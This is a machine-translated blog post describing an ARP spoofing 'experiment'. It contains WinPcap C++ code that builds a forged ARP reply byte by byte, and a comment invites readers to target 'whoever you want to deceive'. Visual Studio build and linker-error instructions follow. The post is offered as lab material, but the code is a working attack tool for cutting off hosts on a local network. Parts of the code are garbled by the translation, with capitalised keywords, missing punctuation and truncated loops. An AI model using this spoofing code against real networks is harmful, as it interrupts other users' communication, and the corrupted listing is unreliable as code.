Shulou(Shulou.com)06/01 Report--

Experimental principle:

A fake ARP reply message is sent to host A, impersonating the IP address of host B, but the MAC address is set to a hardware address that does not exist. After receiving this message, host A mistakenly refreshes the mapping relationship between the IP address and MAC address of host B in the ARP cache, resulting in the interruption of network communication between host An and host B. This method belongs to denial of service (Denial of Service, DoS) * *. The popular network law enforcement software on the network uses ARP spoofing mechanism to send the wrong gateway MAC address to illegal users to interrupt their communication.

According to an ARP spoofing initiated by 172.28.15.3 in the name of 172.28.15.33, we can see that * * sent a series of ARP request packets. On the surface, it looks like the gateway 172.28.15.33 looks up the MAC address of each host in the network, but in fact, it is the person who sends a broadcast packet to tell each host that the MAC address of 172.28.15.33 is "C8-9c-dc-22-61-d0". In this way, when each host receives the broadcast packet, it will replace the original ARP cache table with the forged MAC address, and the fake MAC address will be obtained when you check it with the "arp-a" command.

Experimental code and steps:

/ / 123.cpp: defines the entry point for the console application.

# include "stdafx.h"

# include

Int _ tmain (int argc, _ TCHAR* argv [])

{

Pcap_if_t * allAdapters;// Adapter list

Pcap_if_t * adapter

Pcap_t * adapterHandle;// adapter handle

U_char packet [1020]; / / data packets to be sent

Char errorBuffer [PCAP_ERRBUF_SIZE]; / / error message buffer

If (pcap_findalldevs_ex (PCAP_SRC_IF_STRING, NULL, & allAdapters, errorBuffer) =-1)

{/ / retrieve all network adapters connected to the machine

Fprintf (stderr, "Error in pcap_findalldevs_ex function:% s\ n", errorBuffer)

Return-1

}

If (allAdapters = = NULL)

{/ / No adapters exist

Printf ("\ nNo adapters found! Make sure WinPcap is installed.\ n")

Return 0

}

Int crtAdapter = 0

For (adapter = allAdapters; adapter! = NULL; adapter = adapter- > next)

{/ / traverse input adapter information (name and description information)

Printf ("\ n%d.%s", + + crtAdapter, adapter- > name)

Printf ("-% s\ n", adapter- > description)

}

Printf ("\ n")

/ / Select an adapter

Int adapterNumber

Printf ("Enter the adapter number between 1 and% d:", crtAdapter)

Scanf_s ("d", & adapterNumber)

If (adapterNumber

CrtAdapter)

{

Printf ("\ nAdapter number out of range.\ n")

Pcap_freealldevs (allAdapters); / / release the adapter list

Return-1

}

Adapter = allAdapters

For (crtAdapter = 0; crtAdapter)

Next

/ / Open the specified adapter

AdapterHandle = pcap_open (adapter- > name, / / name of the adapter

65536, / / portion of the packet to capture

/ / 65536 guarantees that the whole

/ / packet will be captured

PCAP_OPENFLAG_PROMISCUOUS, / / promiscuous mode

1000, / / read timeout-1 millisecond

NULL, / / authentication on the remote machine

ErrorBuffer / / error buffer

);

If (adapterHandle = = NULL)

{/ / specified adapter failed to open

Fprintf (stderr, "\ nUnable to open the adapter\ n", adapter- > name)

/ / release adapter list

Pcap_freealldevs (allAdapters)

Return-1

}

Pcap_freealldevs (allAdapters); / / release the adapter list

/ / create a data packet

Packet [0] = 0xc8; packet [1] = 0x9c; packet [2] = 0xdc; packet [3] = 0x22; packet [4] = 0x6c; packet [5] = 0x58; / / mac address of the deceived computer

Packet [6] = 0xc8; packet [7] = 0x9c; packet [8] = 0xdc; packet [9] = 0x22; packet [10] = 0x62; packet [11] = 0x0f; / / your own mac address

Packet [12] = 0x08; packet [13] = 0x06; / / Ethernet encapsulated arp protocol (do not move)

Packet [14] = 0x00; packet [15] = 0x01; / / arp Field 1: represents Ethernet

Packet [16] = 0x08; packet [17] = 0x00; / / arp Field 2: represents IP protocol

Packet [18] = 0x06; / / arp Field 3: represents the length of the layer 2 address

Packet [19] = 0x04; / / arp Field 4: represents the length of the layer 3 address

Packet [20] = 0x00; packet [21] = 0x02; / / arp Field 5: this is an arp reply message; the following is the 6th, 7th, 8th and 9th fields of arp

Packet [22] = 0xc8; packet [23] = 0x9c; packet [24] = 0xdc; packet [25] = 0x22; packet [26] = 0x62; packet [27] = 0x06; / / false gateway address

Packet [28] = 0xac; packet [29] = 0x1c; packet [30] = 0x0f; packet [31] = 0xfe; / / ip of the gateway, here is 172.28.15.254 (not needed in our lab)

Packet [32] = 0xc8; packet [33] = 0x9c; packet [34] = 0xdc; packet [35] = 0x22; packet [36] = 0x61; packet [37] = 0xd0; / / mac address of the deceived computer

Packet [38] = 0xac; packet [39] = 0x1c; packet [40] = 0x0f; packet [41] = 0x21; / / the IP address of the deceived computer. This is 172.28.15.33 (change it to the IP of whoever you want to deceive)

/ / send data packets

For (int ssde=0;ssde (123) attribute (alt+F7)

Configure properties-- > inventory tool-- > input and output-- > embed list-- > No

Project-- > (123) attribute (alt+F7)

Configuration Properties-- > Cramp Cure colors-- > General-- > attach include directories-- > (C:\ WpdPack selects the include file)

Project-- > (123) attribute (alt+F7)

Configuration Properties-- > Linker-- > General-- > additional Library Directory-- > (C:\ WpdPack selects the lib file)

Project-- > (123) attribute (alt+F7)

Configure properties-- > linker-- > input-- > attach dependencies-- > supplement "; Packet.lib;wpcap.lib;Ws2_32.lib;"

Project-- > (123) attribute (alt+F7)

Configuration properties-- > Candlestick colors-- > preprocessor-- > preprocessor definition-- > supplement "; HAVE_REMOTE"

-LINK:fatal error LNK1123: failed during conversion to COFF: invalid or corrupted file-

Step 1: change project-project properties-configuration properties-connectors-manifest files-embedded manifest "yes" to "no". If you can't solve the problem, move on to the second step.

Step 2: check to see if your computer is an 64bit operating system. If so, continue as follows.

Find out if there are two cvtres.exe.

C:\ Program Files (x86)\ Microsoft Visual Studio 10.0\ vc\ bin\ cvtres.exe

C:\ Windows\ Microsoft.NET\ Framework\ v4.0.30319\ cvtres.exe

Right-click properties-for more information, check both version numbers, delete / rename older versions, or reset the Path variable.

The way to get to the root of the problem is the second step, after deleting the old version of cvtres.exe, you don't need to set the configuration every time.

For example: del C:\ "Program Files (x86)"\ "Microsoft Visual Studio 10.0"\ VC\ bin\ cvtres.exe

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.